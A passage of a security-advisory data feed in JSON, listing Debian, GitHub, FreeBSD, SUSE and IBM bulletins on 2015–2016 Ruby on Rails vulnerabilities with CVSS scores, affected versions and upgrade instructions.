Text declared as HTML safe will not have\nquotes escaped when used as attribute values in tag helpers.\n\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:4.1.8-1+deb8u4.\n\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\n\nWe recommend that you upgrade your rails packages.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-25T00:00:00", "type": "osv", "title": "rails - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2022-07-21T05:49:10", "id": "OSV:DSA-3651-1", "href": "https://osv.dev/vulnerability/DSA-3651-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-28T05:37:35", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails 3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow remote attackers to inject arbitrary web script or HTML via text declared as \"HTML safe\" and used as attribute values in tag handlers.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", 
"confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionview Cross-site Scripting vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2023-03-28T05:37:30", "id": "OSV:GHSA-PC3M-V286-2JWJ", "href": "https://osv.dev/vulnerability/GHSA-pc3m-v286-2jwj", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-03-28T05:38:58", "description": "The http_basic_authenticate_with method in actionpack/lib/action_controller/metal/http_authentication.rb in the Basic Authentication implementation in Action Controller in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not use a constant-time algorithm for verifying credentials, which makes it easier for remote attackers to bypass authentication by measuring timing differences.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 3.7, "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2017-10-24T18:33:36", "type": "osv", "title": "actionpack is vulnerable to remote bypass authentication", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576"], "modified": "2023-03-28T05:38:55", "id": "OSV:GHSA-P692-7MM3-3FXG", "href": "https://osv.dev/vulnerability/GHSA-p692-7mm3-3fxg", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-03-28T05:37:16", "description": "Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application's unrestricted use of the render method.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionpack allows remote code execution via application's unrestricted use of render method", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2023-03-28T05:37:15", "id": "OSV:GHSA-78RC-8C29-P45G", "href": "https://osv.dev/vulnerability/GHSA-78rc-8c29-p45g", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:19:23", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the MIME type cache, which allows remote attackers to cause a denial of service (memory consumption) via a crafted HTTP Accept header.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "actionpack is vulnerable to denial of service via a crafted HTTP Accept header", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2023-03-28T05:19:19", "id": 
"OSV:GHSA-FFPV-C4HM-3X6V", "href": "https://osv.dev/vulnerability/GHSA-ffpv-c4hm-3x6v", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-28T05:44:31", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-24T18:33:35", "type": "osv", "title": "Directory traversal vulnerability in Action View in Ruby on Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2023-03-28T05:44:28", "id": "OSV:GHSA-XRR4-P6FQ-HJG7", "href": "https://osv.dev/vulnerability/GHSA-xrr4-p6fq-hjg7", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-05T05:19:45", "description": "\nThe support and utility classes used by the Rails 3.2 framework allow\nremote attackers to cause a denial of service (SystemStackError) via a\nlarge 
XML document depth.\n\n\nFor Debian 7 Wheezy, these problems have been fixed in version\n3.2.6-6+deb7u2.\n\n\nAdditionally this upload adds 'active\\_support/security\\_utils' that will\nbe used by ruby-actionpack-3.2 to address [CVE-2015-7576](https://security-tracker.debian.org/tracker/CVE-2015-7576).\n\n\nWe recommend that you upgrade your ruby-activesupport-3.2 packages.\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-08-27T00:00:00", "type": "osv", "title": "ruby-activesupport-3.2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3227", "CVE-2015-7576"], "modified": "2022-08-05T05:19:42", "id": "OSV:DLA-603-1", "href": "https://osv.dev/vulnerability/DLA-603-1", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby on Rails blog:\n\nRails 4.2.5.2, 4.1.14.2, and 3.2.22.2 have been released! 
These\n\t contain the following important security fixes, and it is\n\t\trecommended that users upgrade as soon as possible.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "baseScore": 7.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.4}, "published": "2016-02-29T00:00:00", "type": "freebsd", "title": "rails -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2016-02-29T00:00:00", "id": "5A016DD0-8AA8-490E-A596-55F4CC17E4EF", "href": "https://vuxml.freebsd.org/freebsd/5a016dd0-8aa8-490e-a596-55f4cc17e4ef.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby on Rails blog:\n\nRails 5.0.0.beta1.1, 4.2.5.1, 4.1.14.1, and 3.2.22.1 have been\n\t released! 
These contain important security fixes, and it is\n\t recommended that users upgrade as soon as possible.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-01-25T00:00:00", "type": "freebsd", "title": "rails -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7576", "CVE-2015-7577", "CVE-2015-7581", "CVE-2016-0751", "CVE-2016-0752", "CVE-2016-0753"], "modified": "2016-01-25T00:00:00", "id": "BB0EF21D-0E1B-461B-BC3D-9CBA39948888", "href": "https://vuxml.freebsd.org/freebsd/bb0ef21d-0e1b-461b-bc3d-9cba39948888.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-01-19T15:51:32", "description": "\n\nRuby Security team reports:\n\nThere is a possible XSS vulnerability in Action View. Text declared as \"HTML\nsafe\" will not have quotes escaped when used as attribute values in tag\nhelpers. 
This vulnerability has been assigned the CVE identifier\nCVE-2016-6316.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2016-08-11T00:00:00", "type": "freebsd", "title": "Rails 4 -- Possible XSS Vulnerability in Action View", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6316"], "modified": "2016-08-11T00:00:00", "id": "43F1C867-654A-11E6-8286-00248C0C745D", "href": "https://vuxml.freebsd.org/freebsd/43f1c867-654a-11e6-8286-00248c0c745d.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "suse": [{"lastseen": "2016-09-04T11:59:55", "description": "This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. 
(boo#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\n\n", "cvss3": {}, "published": "2016-03-19T16:13:08", "type": "suse", "title": "Security update for rubygem-actionpack-3_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-03-19T16:13:08", "id": "OPENSUSE-SU-2016:0835-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00080.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:21:19", "description": "This update for rubygem-actionview-4_1 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. (bsc#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-03-22T18:08:06", "type": "suse", "title": "Security update for rubygem-actionview-4_1 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-03-22T18:08:06", "id": "SUSE-SU-2016:0854-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00083.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:39:50", "description": "This update for rubygem-actionpack-3_2 fixes the following issues:\n\n - CVE-2016-2097: rubygem-actionview: Possible Information Leak\n Vulnerability in Action View. 
(bsc#968850)\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-04-07T13:08:19", "type": "suse", "title": "Security update for rubygem-actionpack-3_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098", "CVE-2016-2097"], "modified": "2016-04-07T13:08:19", "id": "SUSE-SU-2016:0967-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:02:22", "description": "Portus was updated to version 2.0.3, which brings several fixes and\n enhancements:\n\n - Fixed crono job when a repository could not be found.\n - Fixed compatibility issues with Docker 1.10 and Distribution 2.3.\n - Handle multiple scopes in token requests.\n - Add optional fields to token response.\n - Fixed notification events for Distribution v2.3.\n - Paginate through the catalog properly.\n - Do not remove all the repositories if fetching one fails.\n - Fixed SMTP setup.\n - Don't let crono overflow the 'log' column on the DB.\n - Show the actual LDAP error on invalid login.\n - Fixed the location of crono logs.\n - Always use relative paths.\n - Set RUBYLIB when using portusctl.\n - Don't count hidden teams on the admin panel.\n - Warn developers on unsupported docker-compose versions.\n - Directly invalidate LDAP logins without name and password.\n - Don't show the "I forgot my password" link on LDAP.\n\n The following Rubygems bundled within Portus have been updated to fix\n security issues:\n\n - CVE-2016-2098: rubygem-actionpack (bsc#969943).\n - CVE-2015-7578: rails-html-sanitizer (bsc#963326).\n - CVE-2015-7579: rails-html-sanitizer (bsc#963327).\n - CVE-2015-7580: rails-html-sanitizer (bsc#963328).\n - CVE-2015-7576: rubygem-actionpack, rubygem-activesupport (bsc#963563).\n - CVE-2015-7577: rubygem-activerecord 
(bsc#963604).\n - CVE-2016-0751: rubygem-actionpack (bsc#963627).\n - CVE-2016-0752: rubygem-actionpack, rubygem-actionview (bsc#963608).\n - CVE-2016-0753: rubygem-activemodel, rubygem-activesupport,\n rubygem-activerecord (bsc#963617).\n - CVE-2015-7581: rubygem-actionpack (bsc#963625).\n\n", "cvss3": {}, "published": "2016-04-25T20:07:56", "type": "suse", "title": "Security update for portus (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-7580", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-2098", "CVE-2016-0753", "CVE-2016-0752", "CVE-2015-7579", "CVE-2015-7578"], "modified": "2016-04-25T20:07:56", "id": "SUSE-SU-2016:1146-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00053.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:43:04", "description": "This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (boo#968849)\n\n", "cvss3": {}, "published": "2016-03-16T19:12:46", "type": "suse", "title": "Security update for rubygem-actionview-4_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-16T19:12:46", "id": "OPENSUSE-SU-2016:0790-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00057.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:22:34", "description": "This update for rubygem-actionview-4_2 fixes the following issues:\n\n - CVE-2016-2098: rubygem-actionpack: Possible remote code execution\n vulnerability in Action Pack (bsc#968849)\n\n", "cvss3": {}, "published": "2016-03-23T19:08:52", "type": "suse", "title": "Security update for rubygem-actionview-4_2 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": 
["CVE-2016-2098"], "modified": "2016-03-23T19:08:52", "id": "SUSE-SU-2016:0867-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-03/msg00086.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ibm": [{"lastseen": "2023-02-21T01:36:38", "description": "## Summary\n\nVulnerabilities discovered in Ruby on Rails component affect IBM License Metric Tool v9 and IBM BigFix Inventory v9.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-2098_](<https://vulners.com/cve/CVE-2016-2098>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to execute arbitrary code on the system, caused by improper validation of user-supplied input by the render method. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary ruby code on the system with elevated privileges. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111173_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111173>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L) \n\n**CVEID:** [_CVE-2016-2097_](<https://vulners.com/cve/CVE-2016-2097>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by improper validation of user-supplied input by the render method. By sending a specially-crafted request, a remote attacker could exploit this vulnerability to view files located outside of the target application's view directory. 
\nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/111174_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/111174>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\n## Affected Products and Versions\n\nIBM License Metric Tool v9 \n\nIBM BigFix Inventory v9\n\n## Remediation/Fixes\n\nUpgrade to version v9.2.4.0. \n\nUse the following procedure:\n\n * In IBM Endpoint Manager console, expand **IBM BigFix Inventory **or** IBM License Reporting (ILMT)** node under **Sites** node in the tree panel.\n * Click **Fixlets and Tasks** node. **Fixlets and Tasks** panel will be displayed on the right.\n * In the **Fixlets and Tasks** panel locate _Upgrade to the newest version of IBM BigFix Inventory 9.x _or _Upgrade to the newest version IBM License Metric Tool 9.x_ fixlet and run it against the computer that hosts your server.\n \nNote: In an airgapped environment, you have to run BESAirgapTool and BESDownloadCacher first in order to update your site. 
\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2022-08-19T21:04:31", "type": "ibm", "title": "Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9 and IBM BigFix Inventory v9 (CVE-2016-2098 CVE-2016-2097)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2097", "CVE-2016-2098"], "modified": "2022-08-19T21:04:31", "id": "F4CB340412A2CB363B4E3389C6065B45CE9BC3FFC09E2D04AB7B774F53DE8A3A", "href": "https://www.ibm.com/support/pages/node/281239", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:37:43", "description": "## Summary\n\nVulnerabilities discovered in Ruby on Rails component affect IBM License Metric Tool v9, IBM BigFix Inventory v9 and IBM Endpoint Manager for Software Use Analysis v9 & v2.2.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7576_](<https://vulners.com/cve/CVE-2015-7576>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to obtain sensitive information, caused by a timing attack in the basic authentication support in Action Controller. 
An attacker could exploit this vulnerability to obtain the username and password. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110099_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110099>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N) \n \n**CVEID:** [_CVE-2015-7577_](<https://vulners.com/cve/CVE-2015-7577>)** \nDESCRIPTION:** Ruby on Rails could allow a remote attacker to bypass security restrictions, caused by the improper handling of updates in combination with destroy flags when destroying records is disabled by the nested attributes feature in Active Record. An attacker could exploit this vulnerability to set attributes to invalid values. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110100_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110100>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n**CVEID:** [_CVE-2015-7581_](<https://vulners.com/cve/CVE-2015-7581>)** \nDESCRIPTION:** Ruby on Rails is vulnerable to a denial of service, caused by an object leak vulnerability for wildcard controllers in Action Pack. An attacker could exploit this vulnerability to consume all available memory resources. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/110104_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/110104>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) \n \n**CVEID:** [_CVE-2016-0751_](<https://vulners.com/cve/CVE-2016-0751>)** \nDESCRIPTION:** Ruby on Rails is vulnerable to a denial of service, caused by an object leak in Action Pack. 
